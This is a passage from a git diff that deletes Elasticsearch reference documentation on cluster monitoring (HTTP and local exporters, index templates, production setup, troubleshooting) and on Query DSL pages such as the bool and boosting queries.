setup fails (for example, due to security permissions), no data is sent -and warnings are logged. - -NOTE: Empty pipelines are evaluated on the coordinating node during indexing and -they are ignored without any extra effort. This inherently makes them a safe, -no-op operation. - -For monitoring clusters that have disabled `node.ingest` on all nodes, it is -possible to disable the use of the ingest pipeline feature. However, doing so -blocks its purpose, which is to upgrade older monitoring data as our mappings -improve over time. Beginning in 6.0, the ingest pipeline feature is a -requirement on the monitoring cluster; you must have `node.ingest` enabled on at -least one node. - -WARNING: Once any node running 5.5 or later has set up the templates and ingest -pipeline on a monitoring cluster, you must use {kib} 5.5 or later to view all -subsequent data on the monitoring cluster. The easiest way to determine -whether this update has occurred is by checking for the presence of indices -matching `.monitoring-es-6-*` (or more concretely the existence of the -new pipeline). Versions prior to 5.5 used `.monitoring-es-2-*`. - -Each resource that is created by an exporter has a `version` field, -which is used to determine whether the resource should be replaced. The `version` -field value represents the latest version of {monitor-features} that changed the -resource. If a resource is edited by someone or something external to the -{monitor-features}, those changes are lost the next time an automatic update -occurs. diff --git a/docs/reference/monitoring/how-monitoring-works.asciidoc b/docs/reference/monitoring/how-monitoring-works.asciidoc deleted file mode 100644 index 126ec1a0880..00000000000 --- a/docs/reference/monitoring/how-monitoring-works.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[how-monitoring-works]] -== How monitoring works -++++ -How it works -++++ - -Each {es} node, {ls} node, {kib} instance, and Beat instance is considered -unique in the cluster based on its persistent UUID, which is written to the -<> directory when the node or instance starts. - -Monitoring documents are just ordinary JSON documents built by monitoring each -{stack} component at a specified collection interval. If you want to alter the -templates for these indices, see <>. - -{metricbeat} is used to collect monitoring data and to ship it directly to the -monitoring cluster. - -To learn how to collect monitoring data, see: - -* <> -* <> -* {kibana-ref}/xpack-monitoring.html[Monitoring {kib}] -* {logstash-ref}/configuring-logstash.html[Monitoring {ls}] -* Monitoring Beats: -** {auditbeat-ref}/monitoring.html[{auditbeat}] -** {filebeat-ref}/monitoring.html[{filebeat}] -** {functionbeat-ref}/monitoring.html[{functionbeat}] -** {heartbeat-ref}/monitoring.html[{heartbeat}] -** {metricbeat-ref}/monitoring.html[{metricbeat}] -** {packetbeat-ref}/monitoring.html[{packetbeat}] -** {winlogbeat-ref}/monitoring.html[{winlogbeat}] diff --git a/docs/reference/monitoring/http-export.asciidoc b/docs/reference/monitoring/http-export.asciidoc deleted file mode 100644 index de8bbe65308..00000000000 --- a/docs/reference/monitoring/http-export.asciidoc +++ /dev/null @@ -1,106 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[http-exporter]] -=== HTTP exporters - -[IMPORTANT] -========================= -{metricbeat} is the recommended method for collecting and shipping monitoring -data to a monitoring cluster. - -If you have previously configured legacy collection methods, you should migrate -to using {metricbeat} collection methods. Use either {metricbeat} collection or -legacy collection methods; do not use both. - -Learn more about <>. -========================= - -The `http` exporter is the preferred exporter in the {es} {monitor-features} -because it enables the use of a separate monitoring cluster. As a secondary -benefit, it avoids using a production cluster node as a coordinating node for -indexing monitoring data because all requests are HTTP requests to the -monitoring cluster. - -The `http` exporter uses the low-level {es} REST Client, which enables it to -send its data to any {es} cluster it can access through the network. Its requests -make use of the <> parameter to -reduce bandwidth whenever possible, which helps to ensure that communications -between the production and monitoring clusters are as lightweight as possible. - -The `http` exporter supports a number of settings that control how it -communicates over HTTP to remote clusters. In most cases, it is not -necessary to explicitly configure these settings. For detailed -descriptions, see <>. - -[source,yaml] ----------------------------------- -xpack.monitoring.exporters: - my_local: <1> - type: local - my_remote: <2> - type: http - host: [ "10.1.2.3:9200", ... ] <3> - auth: <4> - username: my_username - password: changeme - connection: - timeout: 6s - read_timeout: 60s - ssl: ... <5> - proxy: - base_path: /some/base/path <6> - headers: <7> - My-Proxy-Header: abc123 - My-Other-Thing: [ def456, ... ] - index.name.time_format: YYYY-MM <8> - ----------------------------------- -<1> A `local` exporter defined explicitly whose arbitrary name is `my_local`. -<2> An `http` exporter defined whose arbitrary name is `my_remote`. This name -uniquely defines the exporter but is otherwise unused. -<3> `host` is a required setting for `http` exporters. It must specify the HTTP -port rather than the transport port. The default port value is `9200`. -<4> User authentication for those using {stack} {security-features} or some other - form of user authentication protecting the cluster. -<5> See <> for all TLS/SSL settings. If not supplied, -the default node-level TLS/SSL settings are used. -<6> Optional base path to prefix any outgoing request with in order to - work with proxies. -<7> Arbitrary key/value pairs to define as headers to send with every request. - The array-based key/value format sends one header per value. -<8> A mechanism for changing the date suffix used by default. - -NOTE: The `http` exporter accepts an array of `hosts` and it will round robin -through the list. It is a good idea to take advantage of that feature when the -monitoring cluster contains more than one node. - -Unlike the `local` exporter, _every_ node that uses the `http` exporter attempts -to check and create the resources that it needs. The `http` exporter avoids -re-checking the resources unless something triggers it to perform the checks -again. These triggers include: - -* The production cluster's node restarts. -* A connection failure to the monitoring cluster. -* The license on the production cluster changes. -* The `http` exporter is dynamically updated (and it is therefore replaced). - -The easiest way to trigger a check is to disable, then re-enable the exporter. - -WARNING: This resource management behavior can create a hole for users that -delete monitoring resources. Since the `http` exporter does not re-check its -resources unless one of the triggers occurs, this can result in malformed index -mappings. - -Unlike the `local` exporter, the `http` exporter is inherently routing requests -outside of the cluster. This situation means that the exporter must provide a -username and password when the monitoring cluster requires one (or other -appropriate security configurations, such as TLS/SSL settings). - -IMPORTANT: When discussing security relative to the `http` exporter, it is -critical to remember that all users are managed on the monitoring cluster. This -is particularly important to remember when you move from development -environments to production environments, where you often have dedicated -monitoring clusters. - -For more information about the configuration options for the `http` exporter, -see <>. diff --git a/docs/reference/monitoring/images/architecture.png b/docs/reference/monitoring/images/architecture.png deleted file mode 100644 index 769618c0ccc..00000000000 Binary files a/docs/reference/monitoring/images/architecture.png and /dev/null differ diff --git a/docs/reference/monitoring/images/metricbeat.png b/docs/reference/monitoring/images/metricbeat.png deleted file mode 100644 index f74f8566530..00000000000 Binary files a/docs/reference/monitoring/images/metricbeat.png and /dev/null differ diff --git a/docs/reference/monitoring/index.asciidoc b/docs/reference/monitoring/index.asciidoc deleted file mode 100644 index 06974d20d09..00000000000 --- a/docs/reference/monitoring/index.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[monitor-elasticsearch-cluster]] -= Monitor a cluster - -[partintro] --- -The {stack} {monitor-features} provide a way to keep a pulse on the health and -performance of your {es} cluster. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - --- - -include::overview.asciidoc[] - -include::how-monitoring-works.asciidoc[] - -include::production.asciidoc[] - -include::configuring-metricbeat.asciidoc[] - -include::configuring-filebeat.asciidoc[] - -include::indices.asciidoc[] - -include::collecting-monitoring-data.asciidoc[] -:leveloffset: +1 -include::collectors.asciidoc[] -include::exporters.asciidoc[] -:leveloffset: -1 -include::local-export.asciidoc[] -include::http-export.asciidoc[] -include::pause-export.asciidoc[] - -include::troubleshooting.asciidoc[] diff --git a/docs/reference/monitoring/indices.asciidoc b/docs/reference/monitoring/indices.asciidoc deleted file mode 100644 index 3a7288aa15f..00000000000 --- a/docs/reference/monitoring/indices.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[config-monitoring-indices]] -== Configuring indices for monitoring - -<> are used to configure the indices -that store the monitoring data collected from a cluster. - -You can retrieve the templates through the `_template` API: - -[source,console] ----------------------------------- -GET /_template/.monitoring-* ----------------------------------- - -By default, the template configures one shard and one replica for the -monitoring indices. To override the default settings, add your own template: - -. Set the `template` pattern to `.monitoring-*`. -. Set the template `order` to `1`. This ensures your template is -applied after the default template, which has an order of 0. -. Specify the `number_of_shards` and/or `number_of_replicas` in the `settings` -section. - -For example, the following template increases the number of shards to five -and the number of replicas to two. - -[source,console] ----------------------------------- -PUT /_template/custom_monitoring -{ - "index_patterns": ".monitoring-*", - "order": 1, - "settings": { - "number_of_shards": 5, - "number_of_replicas": 2 - } -} ----------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_template/custom_monitoring --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -IMPORTANT: Only set the `number_of_shards` and `number_of_replicas` in the -settings section. Overriding other monitoring template settings could cause -your monitoring dashboards to stop working correctly. diff --git a/docs/reference/monitoring/local-export.asciidoc b/docs/reference/monitoring/local-export.asciidoc deleted file mode 100644 index 4a356e5fbd2..00000000000 --- a/docs/reference/monitoring/local-export.asciidoc +++ /dev/null @@ -1,107 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[local-exporter]] -=== Local exporters - -[IMPORTANT] -========================= -{metricbeat} is the recommended method for collecting and shipping monitoring -data to a monitoring cluster. - -If you have previously configured legacy collection methods, you should migrate -to using {metricbeat} collection methods. Use either {metricbeat} collection or -legacy collection methods; do not use both. - -Learn more about <>. -========================= - -The `local` exporter is the default exporter in {monitoring}. It routes data -back into the same (local) cluster. In other words, it uses the production -cluster as the monitoring cluster. For example: - -[source,yaml] ---------------------------------------------------- -xpack.monitoring.exporters.my_local_exporter: <1> - type: local ---------------------------------------------------- -<1> The exporter name uniquely defines the exporter, but it is otherwise unused. - -This exporter exists to provide a convenient option when hardware is simply not -available. It is also a way for developers to get an idea of what their actions -do for pre-production clusters when they do not have the time or resources to -provide a separate monitoring cluster. However, this exporter has disadvantages -that impact the local cluster: - -* All indexing impacts the local cluster and the nodes that hold the monitoring -indices' shards. -* Most collectors run on the elected master node. Therefore most indexing occurs -with the elected master node as the coordinating node, which is a bad practice. -* Any usage of {monitoring} for {kib} uses the local cluster's resources for -searches and aggregations, which means that they might not be available for -non-monitoring tasks. -* If the local cluster goes down, the monitoring cluster has inherently gone -down with it (and vice versa), which generally defeats the purpose of monitoring. - -For the `local` exporter, all setup occurs only on the elected master node. This -means that if you do not see any monitoring templates or ingest pipelines, the -elected master node is having issues or it is not configured in the same way. -Unlike the `http` exporter, the `local` exporter has the advantage of accessing -the monitoring cluster's up-to-date cluster state. It can therefore always check -that the templates and ingest pipelines exist without a performance penalty. If -the elected master node encounters errors while trying to create the monitoring -resources, it logs errors, ignores that collection, and tries again after the -next collection. - -The elected master node is the only node to set up resources for the `local` -exporter. Therefore all other nodes wait for the resources to be set up before -indexing any monitoring data from their own collectors. Each of these nodes logs -a message indicating that they are waiting for the resources to be set up. - -One benefit of the `local` exporter is that it lives within the cluster and -therefore no extra configuration is required when the cluster is secured with -{stack} {security-features}. All operations, including indexing operations, that -occur from a `local` exporter make use of the internal transport mechanisms -within {es}. This behavior enables the exporter to be used without providing any -user credentials when {security-features} are enabled. - -For more information about the configuration options for the `local` exporter, -see <>. - -[[local-exporter-cleaner]] -==== Cleaner service - -One feature of the `local` exporter, which is not present in the `http` exporter, -is a cleaner service. The cleaner service runs once per day at 01:00 AM UTC on -the elected master node. - -The role of the cleaner service is to clean, or curate, the monitoring indices -that are older than a configurable amount of time (the default is `7d`). This -cleaner exists as part of the `local` exporter as a safety mechanism. The `http` -exporter does not make use of it because it could enable a single misconfigured -node to prematurely curate data from other production clusters that share the -same monitoring cluster. - -In a dedicated monitoring cluster, you can use the cleaner service without -having to monitor the monitoring cluster itself. For example: - -[source,yaml] ---------------------------------------------------- -xpack.monitoring.collection.enabled: false <1> -xpack.monitoring.history.duration: 3d <2> ---------------------------------------------------- - -<1> Disables the collection of data on the monitoring cluster. -<2> Lowers the default history duration from `7d` to `3d`. The minimum value is -`1d`. This setting can be modified only when using a Gold or higher level -license. For the Basic license level, it uses the default of 7 days. - -To disable the cleaner service, add a disabled local exporter: - -[source,yaml] ----- -xpack.monitoring.exporters.my_local.type: local <1> -xpack.monitoring.exporters.my_local.enabled: false <2> ----- - -<1> Adds a local exporter named `my_local` -<2> Disables the local exporter. This also disables the cleaner service. diff --git a/docs/reference/monitoring/overview.asciidoc b/docs/reference/monitoring/overview.asciidoc deleted file mode 100644 index e4f58e4060c..00000000000 --- a/docs/reference/monitoring/overview.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ -[role="xpack"] -[[monitoring-overview]] -== Monitoring overview -++++ -Overview -++++ - -When you monitor a cluster, you collect data from the {es} nodes, {ls} nodes, -{kib} instances, and Beats in your cluster. You can also -<>. - -All of the monitoring metrics are stored in {es}, which enables you to easily -visualize the data from {kib}. By default, the monitoring metrics are stored in -local indices. - -TIP: In production, we strongly recommend using a separate monitoring cluster. -Using a separate monitoring cluster prevents production cluster outages from -impacting your ability to access your monitoring data. It also prevents -monitoring activities from impacting the performance of your production cluster. -For the same reason, we also recommend using a separate {kib} instance for -viewing the monitoring data. - -You can use {metricbeat} to collect and ship data about {es}, {kib}, {ls}, and -Beats directly to your monitoring cluster rather than routing it through your -production cluster. The following diagram illustrates a typical monitoring -architecture with separate production and monitoring clusters: - -image::images/architecture.png[A typical monitoring environment] - -If you have the appropriate license, you can route data from multiple production -clusters to a single monitoring cluster. For more information about the -differences between various subscription levels, see: -https://www.elastic.co/subscriptions - -IMPORTANT: In general, the monitoring cluster and the clusters being monitored -should be running the same version of the stack. A monitoring cluster cannot -monitor production clusters running newer versions of the stack. If necessary, -the monitoring cluster can monitor production clusters running the latest -release of the previous major version. diff --git a/docs/reference/monitoring/pause-export.asciidoc b/docs/reference/monitoring/pause-export.asciidoc deleted file mode 100644 index 6cf02a1f240..00000000000 --- a/docs/reference/monitoring/pause-export.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[pause-export]] -=== Pausing data collection - -To stop generating {monitoring} data in {es}, disable data collection: - -[source,yaml] ---------------------------------------------------- -xpack.monitoring.collection.enabled: false ---------------------------------------------------- - -When this setting is `false`, {es} monitoring data is not collected and all -monitoring data from other sources such as {kib}, Beats, and Logstash is ignored. - -You can update this setting by using the -{ref}/cluster-update-settings.html[Cluster Update Settings API]. - -If you want to collect data from sources such as {kib}, Beats, and Logstash but -not collect data about your {es} cluster, you can disable data collection -just for {es}: - -[source,yaml] ---------------------------------------------------- -xpack.monitoring.collection.enabled: true -xpack.monitoring.elasticsearch.collection.enabled: false ---------------------------------------------------- - -If you want to separately disable a specific exporter, you can specify the -`enabled` setting (which defaults to `true`) per exporter. For example: - -[source,yaml] ---------------------------------------------------- -xpack.monitoring.exporters.my_http_exporter: - type: http - host: ["10.1.2.3:9200", "10.1.2.4:9200"] - enabled: false <1> ---------------------------------------------------- -<1> Disable the named exporter. If the same name as an existing exporter is not - used, then this will create a completely new exporter that is completely - ignored. This value can be set dynamically by using cluster settings. - -NOTE: Defining a disabled exporter prevents the default exporter from being - created. - -To re-start data collection, re-enable these settings. \ No newline at end of file diff --git a/docs/reference/monitoring/production.asciidoc b/docs/reference/monitoring/production.asciidoc deleted file mode 100644 index 44c14dd7c0f..00000000000 --- a/docs/reference/monitoring/production.asciidoc +++ /dev/null @@ -1,146 +0,0 @@ -[role="xpack"] -[[monitoring-production]] -== Monitoring in a production environment - -In production, you should send monitoring data to a separate _monitoring cluster_ -so that historical data is available even when the nodes you are monitoring are -not. For example, you can use {metricbeat} to ship monitoring data about {kib}, -{es}, {ls}, and Beats to the monitoring cluster. - -[IMPORTANT] -========================= -{metricbeat} is the recommended method for collecting and shipping monitoring -data to a monitoring cluster. - -If you have previously configured legacy collection methods, you should migrate -to using {metricbeat} collection. Use either {metricbeat} collection or -legacy collection methods; do not use both. - -Learn more about <>. -========================= - -If you have at least a Gold Subscription, using a dedicated monitoring cluster -also enables you to monitor multiple clusters from a central location. - -To store monitoring data in a separate cluster: - -. Set up the {es} cluster you want to use as the monitoring cluster. -For example, you might set up a two host cluster with the nodes `es-mon-1` and -`es-mon-2`. -+ --- -[IMPORTANT] -=============================== -* Ideally the monitoring cluster and the production cluster run on the same -{stack} version. However, a monitoring cluster on the latest release of -{major-version} also works with production clusters that use the same major -version. Monitoring clusters that use {major-version} also work with production -clusters that use the latest release of {prev-major-version}. -* There must be at least one <> in the monitoring -cluster; it does not need to be a dedicated ingest node. -=============================== --- - -.. (Optional) Verify that the collection of monitoring data is disabled on the -monitoring cluster. By default, the `xpack.monitoring.collection.enabled` setting -is `false`. -+ --- -For example, you can use the following APIs to review and change this setting: - -[source,console] ----------------------------------- -GET _cluster/settings - -PUT _cluster/settings -{ - "persistent": { - "xpack.monitoring.collection.enabled": false - } -} ----------------------------------- -// TEST[skip:security errs] --- - -.. If the {es} {security-features} are enabled on the monitoring cluster, create -users that can send and retrieve monitoring data. -+ --- -NOTE: If you plan to use {kib} to view monitoring data, username and password -credentials must be valid on both the {kib} server and the monitoring cluster. - --- - -*** If you plan to use {metricbeat} to collect data about {es} or {kib}, -create a user that has the `remote_monitoring_collector` built-in role and a -user that has the `remote_monitoring_agent` -<>. Alternatively, use the -`remote_monitoring_user` <>. - -*** If you plan to use HTTP exporters to route data through your production -cluster, create a user that has the `remote_monitoring_agent` -<>. -+ --- -For example, the -following request creates a `remote_monitor` user that has the -`remote_monitoring_agent` role: - -[source,console] ---------------------------------------------------------------- -POST /_security/user/remote_monitor -{ - "password" : "changeme", - "roles" : [ "remote_monitoring_agent"], - "full_name" : "Internal Agent For Remote Monitoring" -} ---------------------------------------------------------------- -// TEST[skip:needs-gold+-license] - -Alternatively, use the `remote_monitoring_user` <>. --- - -. Configure your production cluster to collect data and send it to the -monitoring cluster: - -** <> - -** <> - -. (Optional) -{logstash-ref}/configuring-logstash.html[Configure {ls} to collect data and send it to the monitoring cluster]. - -. (Optional) Configure the Beats to collect data and send it to the monitoring -cluster. -** {auditbeat-ref}/monitoring.html[Auditbeat] -** {filebeat-ref}/monitoring.html[Filebeat] -** {heartbeat-ref}/monitoring.html[Heartbeat] -** {metricbeat-ref}/monitoring.html[Metricbeat] -** {packetbeat-ref}/monitoring.html[Packetbeat] -** {winlogbeat-ref}/monitoring.html[Winlogbeat] - -. (Optional) Configure {kib} to collect data and send it to the monitoring cluster: - -** {kibana-ref}/monitoring-metricbeat.html[{metricbeat} collection methods] - -** {kibana-ref}/monitoring-kibana.html[Legacy collection methods] - -. (Optional) Create a dedicated {kib} instance for monitoring, rather than using -a single {kib} instance to access both your production cluster and monitoring -cluster. -+ --- -NOTE: If you log in to {kib} using SAML, Kerberos, PKI, OpenID Connect, or token -authentication providers, a dedicated {kib} instance is *required*. The security -tokens that are used in these contexts are cluster-specific, therefore you -cannot use a single {kib} instance to connect to both production and monitoring -clusters. - --- - -.. (Optional) Disable the collection of monitoring data in this {kib} instance. -Set the `xpack.monitoring.kibana.collection.enabled` setting to `false` in the -`kibana.yml` file. For more information about this setting, see -{kibana-ref}/monitoring-settings-kb.html[Monitoring settings in {kib}]. - -. {kibana-ref}/monitoring-data.html[Configure {kib} to retrieve and display the monitoring data]. diff --git a/docs/reference/monitoring/troubleshooting.asciidoc b/docs/reference/monitoring/troubleshooting.asciidoc deleted file mode 100644 index 120e80083b8..00000000000 --- a/docs/reference/monitoring/troubleshooting.asciidoc +++ /dev/null @@ -1,63 +0,0 @@ -[[monitoring-troubleshooting]] -== Troubleshooting monitoring -++++ -Troubleshooting -++++ - -Use the information in this section to troubleshoot common problems and find -answers for frequently asked questions. See also -{logstash-ref}/monitoring-troubleshooting.html[Troubleshooting monitoring in {ls}]. - -For issues that you cannot fix yourself … we’re here to help. -If you are an existing Elastic customer with a support contract, please create -a ticket in the -https://support.elastic.co/customers/s/login/[Elastic Support portal]. -Or post in the https://discuss.elastic.co/[Elastic forum]. - -[discrete] -[[monitoring-troubleshooting-no-data]] -=== No monitoring data is visible in {kib} - -*Symptoms*: -There is no information about your cluster on the *Stack Monitoring* page in -{kib}. - -*Resolution*: -Check whether the appropriate indices exist on the monitoring cluster. For -example, use the <> command to verify that -there is a `.monitoring-kibana*` index for your {kib} monitoring data and a -`.monitoring-es*` index for your {es} monitoring data. If you are collecting -monitoring data by using {metricbeat} the indices have `-mb` in their names. If -the indices do not exist, review your configuration. For example, see -<>. - -[discrete] -[[monitoring-troubleshooting-uuid]] -=== Monitoring data for some {stack} nodes or instances is missing from {kib} - -*Symptoms*: -The *Stack Monitoring* page in {kib} does not show information for some nodes or -instances in your cluster. - -*Resolution*: -Verify that the missing items have unique UUIDs. Each {es} node, {ls} node, -{kib} instance, Beat instance, and APM Server is considered unique based on its -persistent UUID, which is found in its `path.data` directory. Alternatively, you -can find the UUIDs in the product logs at startup. - -In some cases, you can also retrieve this information via APIs: - -* For Beat instances, use the HTTP endpoint to retrieve the `uuid` property. -For example, refer to -{filebeat-ref}/http-endpoint.html[Configure an HTTP endpoint for {filebeat} metrics]. -* For {kib} instances, use the -{kibana-ref}/access.html#status[status endpoint] to retrieve the `uuid` property. -* For {ls} nodes, use the -{logstash-ref}/monitoring-logstash.html[monitoring APIs root resource] to -retrieve the `id` property. - -TIP: When you install {es}, {ls}, {kib}, APM Server, or Beats, their `path.data` -directory should be non-existent or empty; do not copy this directory from other -installations. - - diff --git a/docs/reference/query-dsl.asciidoc b/docs/reference/query-dsl.asciidoc deleted file mode 100644 index 6e7d3527f91..00000000000 --- a/docs/reference/query-dsl.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ -[[query-dsl]] -= Query DSL - -[partintro] --- - -Elasticsearch provides a full Query DSL (Domain Specific Language) based on JSON to define queries. -Think of the Query DSL as an AST (Abstract Syntax Tree) of queries, consisting of two types of -clauses: - -Leaf query clauses:: - -Leaf query clauses look for a particular value in a particular field, such as the -<>, <> or -<> queries. These queries can be used -by themselves. - -Compound query clauses:: - -Compound query clauses wrap other leaf *or* compound queries and are used to combine -multiple queries in a logical fashion (such as the -<> or <> query), -or to alter their behaviour (such as the -<> query). - -Query clauses behave differently depending on whether they are used in -<>. - -[[query-dsl-allow-expensive-queries]] -Allow expensive queries:: -Certain types of queries will generally execute slowly due to the way they are implemented, which can affect -the stability of the cluster. Those queries can be categorised as follows: -* Queries that need to do linear scans to identify matches: -** <> -* Queries that have a high up-front cost : -** <> (except on <> fields) -** <> (except on <> fields) -** <> (except on <> fields or those without <>) -** <> (except on <> fields) -** <> on <> and <> fields -* <> -* Queries on <> -* Queries that may have a high per-document cost: -** <> -** <> - -The execution of such queries can be prevented by setting the value of the `search.allow_expensive_queries` -setting to `false` (defaults to `true`). --- - -include::query-dsl/query_filter_context.asciidoc[] - -include::query-dsl/compound-queries.asciidoc[] - -include::query-dsl/full-text-queries.asciidoc[] - -include::query-dsl/geo-queries.asciidoc[] - -include::query-dsl/shape-queries.asciidoc[] - -include::query-dsl/joining-queries.asciidoc[] - -include::query-dsl/match-all-query.asciidoc[] - -include::query-dsl/span-queries.asciidoc[] - -include::query-dsl/special-queries.asciidoc[] - -include::query-dsl/term-level-queries.asciidoc[] - -include::query-dsl/minimum-should-match.asciidoc[] - -include::query-dsl/multi-term-rewrite.asciidoc[] - -include::query-dsl/regexp-syntax.asciidoc[] diff --git a/docs/reference/query-dsl/_query-template.asciidoc b/docs/reference/query-dsl/_query-template.asciidoc deleted file mode 100644 index a5b8b447525..00000000000 --- a/docs/reference/query-dsl/_query-template.asciidoc +++ /dev/null @@ -1,118 +0,0 @@ -//// -This is a template for query DSL reference documentation. - -To document a new query type, copy this file, remove comments like this, and -replace "sample" with the appropriate query name. - -Ensure the new query docs are linked and included in -docs/reference/query-dsl.asciidoc -//// - -[[query-dsl-sample-query]] -=== Sample query -++++ -Sample -++++ - -//// -INTRO -Include a brief, 1-2 sentence description. -//// - -Does a cool thing. For example, it matches `x` to `y`. - -[[sample-query-ex-request]] -==== Example request -//// -Basic example of a search request consisting of only this query. - -Guidelines -*************************************** -* Don't include the index name in the request path. -* Don't include common parameters, such as `boost`. -* For clarity, use the long version of the request body. You can include a - short request example in the 'Notes' section. -* Ensure // TEST[skip:...] comments are removed. -*************************************** -//// - -[source,console] ----- -GET _search -{ - "query": { - "sample": { - "foo": "baz", - "bar": true - } - } -} ----- -// TEST[skip: REMOVE THIS COMMENT.] - -[[sample-query-params]] -==== Parameters - -//// -Documents each parameter for the query. - -Guidelines -*************************************** -* Use a definition list. -* End each definition with a period. -* Include whether the parameter is Optional or Required and the data type. -* Include default values as the last sentence of the first paragraph. -* Include a range of valid values, if applicable. -* If the parameter requires a specific delimiter for multiple values, say so. -* If the parameter supports wildcards, ditto. -* For large or nested objects, consider linking to a separate definition list. -*************************************** -//// - -`foo`:: -(Required, string) -A cool thing. - -`bar`:: -(Optional, string) -If `true`, does a cool thing. -Defaults to `false`. - - -[[sample-query-notes]] -==== Notes -//// -Contains extra information about the query, including: -* Additional examples for parameters or short request bodies. -* Tips or advice for using the query. - -Guidelines -*************************************** -* For longer sections, consider using the `[%collapsible] macro. -* Ensure // TEST[skip:...] comments are removed. -*************************************** -//// - -===== Avoid using the `sample` query for `text` fields - -By default, {es} changes the values of `text` fields during analysis. For -example, ... - -===== Using the `sample` query on time series data - -You can use the `sample` query to perform searches on time series data. -For example: - -[source,console] ----- -GET my_time_series_index/_search -{ - "query": { - "sample": { - "foo": "baz", - "bar": false - } - } -} ----- -// TEST[skip: REMOVE THIS COMMENT.] \ No newline at end of file diff --git a/docs/reference/query-dsl/bool-query.asciidoc b/docs/reference/query-dsl/bool-query.asciidoc deleted file mode 100644 index 1a78e131e01..00000000000 --- a/docs/reference/query-dsl/bool-query.asciidoc +++ /dev/null @@ -1,171 +0,0 @@ -[[query-dsl-bool-query]] -=== Boolean query -++++ -Boolean -++++ - -A query that matches documents matching boolean combinations of other -queries. The bool query maps to Lucene `BooleanQuery`. It is built using -one or more boolean clauses, each clause with a typed occurrence. The -occurrence types are: - -[cols="<,<",options="header",] -|======================================================================= -|Occur |Description -|`must` |The clause (query) must appear in matching documents and will -contribute to the score. - -|`filter` |The clause (query) must appear in matching documents. However unlike -`must` the score of the query will be ignored. Filter clauses are executed -in <>, meaning that scoring is ignored -and clauses are considered for caching. - -|`should` |The clause (query) should appear in the matching document. - -|`must_not` |The clause (query) must not appear in the matching -documents. Clauses are executed in <> meaning -that scoring is ignored and clauses are considered for caching. Because scoring is -ignored, a score of `0` for all documents is returned. -|======================================================================= - -The `bool` query takes a _more-matches-is-better_ approach, so the score from -each matching `must` or `should` clause will be added together to provide the -final `_score` for each document. - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "bool" : { - "must" : { - "term" : { "user.id" : "kimchy" } - }, - "filter": { - "term" : { "tags" : "production" } - }, - "must_not" : { - "range" : { - "age" : { "gte" : 10, "lte" : 20 } - } - }, - "should" : [ - { "term" : { "tags" : "env1" } }, - { "term" : { "tags" : "deployed" } } - ], - "minimum_should_match" : 1, - "boost" : 1.0 - } - } -} --------------------------------------------------- - -[[bool-min-should-match]] -==== Using `minimum_should_match` - -You can use the `minimum_should_match` parameter to specify the number or -percentage of `should` clauses returned documents _must_ match. - -If the `bool` query includes at least one `should` clause and no `must` or -`filter` clauses, the default value is `1`. -Otherwise, the default value is `0`. - -For other valid values, see the -<>. - -[[score-bool-filter]] -==== Scoring with `bool.filter` - -Queries specified under the `filter` element have no effect on scoring -- -scores are returned as `0`. Scores are only affected by the query that has -been specified. For instance, all three of the following queries return -all documents where the `status` field contains the term `active`. - -This first query assigns a score of `0` to all documents, as no scoring -query has been specified: - -[source,console] ---------------------------------- -GET _search -{ - "query": { - "bool": { - "filter": { - "term": { - "status": "active" - } - } - } - } -} ---------------------------------- - -This `bool` query has a `match_all` query, which assigns a score of `1.0` to -all documents. - -[source,console] ---------------------------------- -GET _search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "term": { - "status": "active" - } - } - } - } -} ---------------------------------- - -This `constant_score` query behaves in exactly the same way as the second example above. -The `constant_score` query assigns a score of `1.0` to all documents matched -by the filter. - -[source,console] ---------------------------------- -GET _search -{ - "query": { - "constant_score": { - "filter": { - "term": { - "status": "active" - } - } - } - } -} ---------------------------------- - -[[named-queries]] -==== Named queries - -Each query accepts a `_name` in its top level definition. You can use named -queries to track which queries matched returned documents. If named queries are -used, the response includes a `matched_queries` property for each hit. - -[source,console] ----- -GET /_search -{ - "query": { - "bool": { - "should": [ - { "match": { "name.first": { "query": "shay", "_name": "first" } } }, - { "match": { "name.last": { "query": "banon", "_name": "last" } } } - ], - "filter": { - "terms": { - "name.last": [ "banon", "kimchy" ], - "_name": "test" - } - } - } - } -} ----- diff --git a/docs/reference/query-dsl/boosting-query.asciidoc b/docs/reference/query-dsl/boosting-query.asciidoc deleted file mode 100644 index 050ca7746bd..00000000000 --- a/docs/reference/query-dsl/boosting-query.asciidoc +++ /dev/null @@ -1,63 +0,0 @@ -[[query-dsl-boosting-query]] -=== Boosting query -++++ -Boosting -++++ - -Returns documents matching a `positive` query while reducing the -<> of documents that also match a -`negative` query. - -You can use the `boosting` query to demote certain documents without -excluding them from the search results. - -[[boosting-query-ex-request]] -==== Example request - -[source,console] ----- -GET /_search -{ - "query": { - "boosting": { - "positive": { - "term": { - "text": "apple" - } - }, - "negative": { - "term": { - "text": "pie tart fruit crumble tree" - } - }, - "negative_boost": 0.5 - } - } -} ----- - -[[boosting-top-level-params]] -==== Top-level parameters for `boosting` - -`positive`:: -(Required, query object) Query you wish to run. Any returned documents must -match this query. - -`negative`:: -+ --- -(Required, query object) Query used to decrease the <> of matching documents. - -If a returned document matches the `positive` query and this query, the -`boosting` query calculates the final <> for -the document as follows: - -. Take the original relevance score from the `positive` query. -. Multiply the score by the `negative_boost` value. --- - -`negative_boost`:: -(Required, float) Floating point number between `0` and `1.0` used to decrease -the <> of documents matching the -`negative` query. \ No newline at end of file diff --git a/docs/reference/query-dsl/common-terms-query.asciidoc b/docs/reference/query-dsl/common-terms-query.asciidoc deleted file mode 100644 index b62bb95fd73..00000000000 --- a/docs/reference/query-dsl/common-terms-query.asciidoc +++ /dev/null @@ -1,297 +0,0 @@ -[[query-dsl-common-terms-query]] -=== Common Terms Query - -deprecated[7.3.0,"Use <> instead, which skips blocks of documents efficiently, without any 